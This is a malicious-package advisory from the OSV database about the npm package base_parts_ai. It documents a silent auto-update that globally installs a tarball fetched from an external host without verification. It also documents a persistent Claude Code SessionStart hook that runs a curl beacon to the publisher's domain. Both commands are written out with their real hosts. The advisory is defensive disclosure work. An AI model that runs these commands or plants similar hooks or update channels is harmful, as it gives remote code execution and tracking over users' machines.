MAL-2026-6228
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/base_parts_ai/MAL-2026-6228.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6228
- Published
- 2026-06-19T15:59:03Z
- Modified
- 2026-06-19T17:01:45.569867463Z
- Summary
- Malicious code in base_parts_ai (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219)
When a user runs the package's
jccorjcxCLI, lib/aiutils.js polls https://jai.jaskle.cn/hm/hmpub/aicccfg for anewVervalue and, if it differs from the installed version, executesnpm install -g https://jdwfiles.oss-cn-hangzhou.aliyuncs.com/npm_pkg/base_parts_ai-<newVer>.tgz --force --registry=https://registry.npmmirror.comwith no hash or signature verification. The interactive confirmation prompt has been commented out and theconfirmedvariable is hardcoded to"yes", so the global install runs unattended. The tarball is served from a different domain (Aliyun OSS) than the version manifest, and either endpoint — or a compromise of either — can push arbitrary code globally to every CLI user. Separately, the package'ssetapi_ccflow writes a persistentSessionStarthook into~/.claude/settings.jsonthat runscurl -s -m 5 https://jai.jaskle.cn/hm/pub/ai_tip?cli=cc-<os>_<arch>on every Claude Code session start, establishing a phone-home channel keyed to the publisher domain. Note:package.jsondeclaresscripts.__postinstall(double underscore), which npm does not recognize, andmain.jsis a no-op — there is no automatic execution onnpm installorrequire(). The auto-update channel fires when the user invokes the documented CLI, which is the package's primary advertised use. - Database specific
{ "malicious-packages-origins": [ { "sha256": "07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219", "source": "amazon-inspector", "modified_time": "2026-06-19T15:59:06Z", "versions": [ "1.0.52" ], "id": "IN-MAL-2026-007088", "import_time": "2026-06-19T16:53:21.531223536Z" }, { "sha256": "9cc65c2ae1b0b729887f0f0a01e3719768e4f30ac6d3e314605076c75cdb3866", "source": "amazon-inspector", "modified_time": "2026-06-19T15:59:03Z", "versions": [ "1.0.50" ], "id": "IN-MAL-2026-007087", "import_time": "2026-06-19T16:53:21.458464474Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / base_parts_ai
Package
- Name
- base_parts_ai
- View open source insights on deps.dev
- Purl
- pkg:npm/base_parts_ai
Database specific
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/base_parts_ai/MAL-2026-6228.json"
indicators
{
"evidence_files": [
{
"sha256": "391a902f103a53c275ee65b778f76eb73896cd8913baa27066862fd09bf5c2d8",
"tlsh": "2e62e9ee2ceb6053806b71394bdf910670696a03021de614fa6de3a41ffcb6581b5fd8",
"path": "lib/ai_utils.js"
},
{
"sha256": "98c28843fea4796b7b405fbea772bc14d9ff34fa5d89cb86b021be10aa5fddcc",
"tlsh": "5e22c6aa48f6087958d422719bef51462265d6030328f8307bbec3554fd8ac647f97fb",
"path": "lib/setapi_cc.js"
},
{
"sha256": "09ebe29fa9a187ec06ee2721da03d13fc97b317dac75b86520d9b1cf07edfdce",
"tlsh": "46f0f628c8b05eb319cd9dd85c1e514a64744c032a8cbd2d37f3465c0f8e36b25ba29a",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-A2QfiW+1YAlV4N61Yqo3F81Ls4vsZ0wM+YZ9ocl7VyXi1IYwTKrlqTBGfB/HUVRb9OJD9KPhLL9Xk6DfB29QFQ==",
"sha1": "68a265076284109dce83f178402094a79b61c89a"
},
"filename": "base_parts_ai-1.0.52.tgz"
}
]
}